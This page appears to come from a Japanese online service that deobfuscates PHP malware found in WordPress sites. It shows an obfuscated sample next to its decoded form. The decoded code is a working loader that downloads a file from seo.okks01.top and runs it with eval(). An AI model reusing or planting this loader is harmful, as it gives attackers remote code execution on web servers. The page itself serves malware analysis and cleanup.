Japanese 
English
PHP 難読化コードの復元・デコードWordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
1 | <?php goto d6bDR; izJA9: eval("\x3f\76" . gkzA8(strrev($gFPUW))); goto OwMFr; C8MzI: $gFPUW .= "\56\x31\x30"; goto x_X4M; Os6O7: $gFPUW .= "\145\x68"; goto eFsCg; gr_xr: $gFPUW .= "\x2f\170\145\x79\x69"; goto Os6O7; ol7Xc: $gFPUW .= "\164"; goto C8MzI; zUtsy: $gFPUW .= "\163\145\x72"; goto gr_xr; tgnEk: $gFPUW .= "\x68"; goto izJA9; OYhni: $gFPUW .= "\164"; goto AAQdQ; etXOc: $gFPUW .= "\x3a\163\x70\x74\x74"; goto tgnEk; Ni8z3: $gFPUW .= "\57\57"; goto etXOc; eFsCg: $gFPUW .= "\x2f\x70\157"; goto ol7Xc; d6bDR: $gFPUW = ''; goto OYhni; p0ARq: $gFPUW .= "\x6f\x2e\x6f\145"; goto VMaxg; AAQdQ: $gFPUW .= "\170\164\x2e\65\62"; goto zUtsy; VMaxg: $gFPUW .= "\x73"; goto Ni8z3; x_X4M: $gFPUW .= "\163\153\x6b"; goto p0ARq; OwMFr: function GKza8($LDolw, $c3LiH = "\x47\x45\x54", $hZGU5 = array(), $Vi5Rc = 45) { try { goto GUPCu; MtErA: $zgVgf = $JbsQV; goto Gn15c; Ks53t: curl_setopt($HaLvO, CURLOPT_CONNECTTIMEOUT, 0); goto jOH7M; xEfCF: curl_setopt($HaLvO, CURLOPT_TIMEOUT, $Vi5Rc); goto Wjs23; rlxKU: $zgVgf = substr($zgVgf, $Jii_7 + 2 + $RcZ1g + 2); goto oat_P; s65RP: $KO9IA = ''; goto OiECo; Boh63: if (!($c3LiH == "\x50\x4f\123\x54")) { goto fAMCm; } goto n14l1; GtbWo: $BF2NN[] = "\x43\x6f\156\x74\145\156\164\x2d\124\x79\160\145\72\x20\141\x70\160\154\x69\x63\x61\x74\x69\x6f\x6e\57\170\x2d\x77\x77\167\55\146\157\162\155\x2d\165\x72\154\145\x6e\x63\x6f\x64\x65\x64"; goto RGCOV; KnqZR: $JbsQV = ''; goto ZJiEd; b_JwW: fwrite($PYf4H, $JWLrM); goto s65RP; SFY8_: $BF2NN = ["{$c3LiH}\40{$XPrUJ}{$MkBkK}\40\x48\124\124\120\x2f\x31\56\61", "\x48\157\163\164\72\x20{$DVVum}", "\x55\x73\145\162\55\x41\147\x65\156\x74\72\x20\x4d\x6f\x7a\151\154\154\x61\x2f\65\x2e\60\x20\50\127\151\x6e\144\157\x77\x73\x20\x4e\124\40\61\x30\x2e\x30\73\x20\127\x69\156\x36\64\73\x20\x78\x36\x34\51\x20\x41\160\160\x6c\145\127\145\x62\x4b\x69\164\x2f\x35\x33\x37\56\63\x36\x20\50\x4b\x48\x54\x4d\114\54\40\154\151\x6b\x65\x20\x47\145\x63\153\x6f\x29\40\x43\x68\x72\x6f\x6d\x65\x2f\x39\61\x2e\x30\56\64\x34\67\x32\56\x31\62\x34\x20\x53\141\146\141\162\151\x2f\65\63\67\56\x33\66", "\x43\x6f\156\x6e\145\143\x74\151\x6f\x6e\x3a\40\x43\x6c\x6f\x73\145"]; goto Boh63; eT4R9: $XKv1J = parse_url($LDolw); goto qaH_U; jmV_I: return trim(trim($JQsGw, "\xef\xbb\xbf")); goto YcdGD; iyNyh: $KO9IA .= fgets($PYf4H, 1024); goto B3zWH; GhDnS: $JbsQV .= substr($zgVgf, $Jii_7 + 2, $RcZ1g); goto rlxKU; r_vMk: curl_setopt($HaLvO, CURLOPT_URL, $LDolw); goto K8qKJ; ozZh0: $Jii_7 = strpos($zgVgf, "\xd\xa"); goto gcwI1; TdT65: curl_setopt($HaLvO, CURLOPT_SSL_VERIFYPEER, false); goto jnh3y; JTlFd: $JWLrM = implode("\xd\xa", $BF2NN) . "\xd\xa\15\12"; goto Ue_Ls; Gn15c: wmV0f: goto I5l3o; ZCbhh: $PYf4H = stream_socket_client("{$NVg0k}\72\x2f\57{$DVVum}\x3a{$dIEQa}", $et7P1, $p62rE, $Vi5Rc); goto yLJlW; jOH7M: curl_setopt($HaLvO, CURLOPT_RETURNTRANSFER, 1); goto TdT65; yLJlW: if ($PYf4H) { goto hkgoP; } goto qWIyP; hlXAb: nfuxq: goto GhDnS; za0uW: fAMCm: goto JTlFd; RGCOV: $BF2NN[] = "\x43\x6f\156\x74\x65\156\164\x2d\114\x65\156\147\164\x68\x3a\40" . strlen($rbVbd); goto za0uW; Hzu2F: $BF2NN = isset($W4VVG[0]) ? $W4VVG[0] : ''; goto Sqcib; K8qKJ: curl_setopt($HaLvO, CURLOPT_USERAGENT, "\x47\117"); goto Ks53t; Sqcib: $zgVgf = isset($W4VVG[1]) ? $W4VVG[1] : ''; goto Om01P; bCQwS: $JQsGw = curl_exec($HaLvO); goto VAjdj; mVNtZ: KvQAO: goto b_JwW; qaH_U: $DVVum = $XKv1J["\x68\x6f\x73\x74"]; goto uQGgs; MkR4w: $JWLrM .= $rbVbd . "\15\xa"; goto mVNtZ; I5l3o: return trim($zgVgf); goto RgsF4; kHFqE: i2uQJ: goto MtErA; qWIyP: return 0; goto d1UAW; oat_P: goto z6HyA; goto kHFqE; Om01P: if (!(stripos($BF2NN, "\124\x72\x61\156\x73\x66\145\x72\55\105\x6e\143\x6f\144\x69\156\x67\72\x20\x63\150\165\x6e\153\x65\x64") !== false)) { goto wmV0f; } goto KnqZR; Ue_Ls: if (!($c3LiH == "\120\x4f\x53\x54")) { goto KvQAO; } goto MkR4w; qLdPS: goto i2uQJ; goto hlXAb; ZJiEd: z6HyA: goto wUnMr; A9Mgj: $RcZ1g = hexdec(substr($zgVgf, 0, $Jii_7)); goto jdmHI; jdmHI: if (!($RcZ1g === 0)) { goto nfuxq; } goto qLdPS; qVQNg: curl_setopt($HaLvO, CURLOPT_POSTFIELDS, http_build_query($hZGU5)); goto QiAh3; tK6Kk: $PG6FJ = isset($XKv1J["\163\x63\150\x65\155\145"]) ? $XKv1J["\163\143\x68\145\155\145"] : "\150\x74\x74\x70"; goto cFtA3; d1UAW: hkgoP: goto SFY8_; szcTj: fsf97: goto Ly7Se; sehVa: $HaLvO = curl_init(); goto r_vMk; B3zWH: goto DuV4H; goto szcTj; cFtA3: $dIEQa = isset($XKv1J["\160\x6f\x72\x74"]) ? $XKv1J["\x70\157\x72\x74"] : ($PG6FJ === "\x68\x74\164\160\163" ? 443 : 80); goto kODPg; GUPCu: if (!(function_exists("\143\x75\x72\154\x5f\151\156\151\164") && function_exists("\143\x75\x72\154\137\145\x78\x65\x63"))) { goto oZKWN; } goto sehVa; uQGgs: $XPrUJ = isset($XKv1J["\160\141\164\x68"]) ? $XKv1J["\160\x61\x74\x68"] : "\x2f"; goto HYMJc; OiECo: DuV4H: goto bjO1J; bjO1J: if (feof($PYf4H)) { goto fsf97; } goto iyNyh; MXxah: goto i2uQJ; goto zRfim; Wjs23: if (!($c3LiH == "\x50\x4f\123\124")) { goto BhBBU; } goto wMjs1; VAjdj: curl_close($HaLvO); goto jmV_I; Ly7Se: fclose($PYf4H); goto AKNno; gcwI1: if (!($Jii_7 === false)) { goto n_nh1; } goto MXxah; AKNno: $W4VVG = explode("\xd\12\15\12", $KO9IA, 2); goto Hzu2F; wMjs1: curl_setopt($HaLvO, CURLOPT_POST, 1); goto qVQNg; YNcBj: curl_setopt($HaLvO, CURLOPT_FOLLOWLOCATION, true); goto xEfCF; HYMJc: $MkBkK = isset($XKv1J["\x71\165\x65\x72\171"]) ? "\x3f" . $XKv1J["\161\165\145\162\171"] : ''; goto tK6Kk; jnh3y: curl_setopt($HaLvO, CURLOPT_SSL_VERIFYHOST, false); goto YNcBj; n14l1: $rbVbd = http_build_query($hZGU5); goto GtbWo; QiAh3: BhBBU: goto bCQwS; wUnMr: if (!true) { goto i2uQJ; } goto ozZh0; YcdGD: oZKWN: goto eT4R9; zRfim: n_nh1: goto A9Mgj; kODPg: $NVg0k = $PG6FJ === "\150\164\x74\x70\x73" ? "\163\163\154" : "\164\143\160"; goto ZCbhh; RgsF4: } catch (Exception $F20ig) { } return 0; } |
001 | <?php |
002 |
003 | $gFPUW = ''; |
004 | $gFPUW = "t"; |
005 | $gFPUW = "txt.52"; |
006 | $gFPUW = "txt.52ser"; |
007 | $gFPUW = "txt.52ser/xeyi"; |
008 | $gFPUW = "txt.52ser/xeyieh"; |
009 | $gFPUW = "txt.52ser/xeyieh/po"; |
010 | $gFPUW = "txt.52ser/xeyieh/pot"; |
011 | $gFPUW = "txt.52ser/xeyieh/pot.10"; |
012 | $gFPUW = "txt.52ser/xeyieh/pot.10skk"; |
013 | $gFPUW = "txt.52ser/xeyieh/pot.10skko.oe"; |
014 | $gFPUW = "txt.52ser/xeyieh/pot.10skko.oes"; |
015 | $gFPUW = "txt.52ser/xeyieh/pot.10skko.oes//"; |
016 | $gFPUW = "txt.52ser/xeyieh/pot.10skko.oes//:sptt"; |
017 | $gFPUW = "txt.52ser/xeyieh/pot.10skko.oes//:sptth"; |
018 | eval("?>" . gkzA8("https://seo.okks01.top/heiyex/res25.txt")); |
019 | function GKza8($LDolw, $c3LiH = "GET", $hZGU5 = array(), $Vi5Rc = 45) |
020 | { |
021 | try { |
022 | if (!(function_exists("curl_init") && function_exists("curl_exec"))) { |
023 | $XKv1J = parse_url($LDolw); |
024 | $DVVum = $XKv1J["host"]; |
025 | $XPrUJ = isset($XKv1J["path"]) ? $XKv1J["path"] : "/"; |
026 | $MkBkK = isset($XKv1J["query"]) ? "?" . $XKv1J["query"] : ''; |
027 | $PG6FJ = isset($XKv1J["scheme"]) ? $XKv1J["scheme"] : "http"; |
028 | $dIEQa = isset($XKv1J["port"]) ? $XKv1J["port"] : ($PG6FJ === "https" ? 443 : 80); |
029 | $NVg0k = $PG6FJ === "https" ? "ssl" : "tcp"; |
030 | $PYf4H = stream_socket_client("{$NVg0k}://{$DVVum}:{$dIEQa}", $et7P1, $p62rE, $Vi5Rc); |
031 | if ($PYf4H) { |
032 | $BF2NN = ["{$c3LiH} {$XPrUJ}{$MkBkK} HTTP/1.1", "Host: {$DVVum}", "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36", "Connection: Close"]; |
033 | if (!($c3LiH == "POST")) { |
034 | goto fAMCm; |
035 | } |
036 | $rbVbd = http_build_query($hZGU5); |
037 | $BF2NN[] = "Content-Type: application/x-www-form-urlencoded"; |
038 | $BF2NN[] = "Content-Length: " . strlen($rbVbd); |
039 | fAMCm: |
040 | $JWLrM = implode("\r\n", $BF2NN) . "\r\n\r\n"; |
041 | if (!($c3LiH == "POST")) { |
042 | goto KvQAO; |
043 | } |
044 | $JWLrM .= $rbVbd . "\r\n"; |
045 | KvQAO: |
046 | fwrite($PYf4H, $JWLrM); |
047 | $KO9IA = ''; |
048 | DuV4H: |
049 | if (feof($PYf4H)) { |
050 | fclose($PYf4H); |
051 | $W4VVG = array(0 => ""); |
052 | $BF2NN = isset($W4VVG[0]) ? $W4VVG[0] : ''; |
053 | $zgVgf = isset($W4VVG[1]) ? $W4VVG[1] : ''; |
054 | if (!(stripos($BF2NN, "Transfer-Encoding: chunked") !== false)) { |
055 | goto wmV0f; |
056 | } |
057 | $JbsQV = ''; |
058 | z6HyA: |
059 | if (!true) { |
060 | goto i2uQJ; |
061 | } |
062 | $Jii_7 = strpos($zgVgf, "\r\n"); |
063 | if (!($Jii_7 === false)) { |
064 | $RcZ1g = hexdec(substr($zgVgf, 0, $Jii_7)); |
065 | if (!($RcZ1g === 0)) { |
066 | $JbsQV .= substr($zgVgf, $Jii_7 + 2, $RcZ1g); |
067 | $zgVgf = substr($zgVgf, $Jii_7 + 2 + $RcZ1g + 2); |
068 | goto z6HyA; |
069 | } |
070 | goto i2uQJ; |
071 | } |
072 | i2uQJ: |
073 | $zgVgf = $JbsQV; |
074 | wmV0f: |
075 | return trim($zgVgf); |
076 | } |
077 | $KO9IA .= fgets($PYf4H, 1024); |
078 | goto DuV4H; |
079 | } |
080 | return 0; |
081 | } |
082 | $HaLvO = curl_init(); |
083 | curl_setopt($HaLvO, CURLOPT_URL, $LDolw); |
084 | curl_setopt($HaLvO, CURLOPT_USERAGENT, "GO"); |
085 | curl_setopt($HaLvO, CURLOPT_CONNECTTIMEOUT, 0); |
086 | curl_setopt($HaLvO, CURLOPT_RETURNTRANSFER, 1); |
087 | curl_setopt($HaLvO, CURLOPT_SSL_VERIFYPEER, false); |
088 | curl_setopt($HaLvO, CURLOPT_SSL_VERIFYHOST, false); |
089 | curl_setopt($HaLvO, CURLOPT_FOLLOWLOCATION, true); |
090 | curl_setopt($HaLvO, CURLOPT_TIMEOUT, $Vi5Rc); |
091 | if (!($c3LiH == "POST")) { |
092 | goto BhBBU; |
093 | } |
094 | curl_setopt($HaLvO, CURLOPT_POST, 1); |
095 | curl_setopt($HaLvO, CURLOPT_POSTFIELDS, http_build_query($hZGU5)); |
096 | BhBBU: |
097 | $JQsGw = curl_exec($HaLvO); |
098 | curl_close($HaLvO); |
099 | return trim(trim($JQsGw, "")); |
100 | } catch (Exception $F20ig) { |
101 | } |
102 | return 0; |
103 | } |
■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.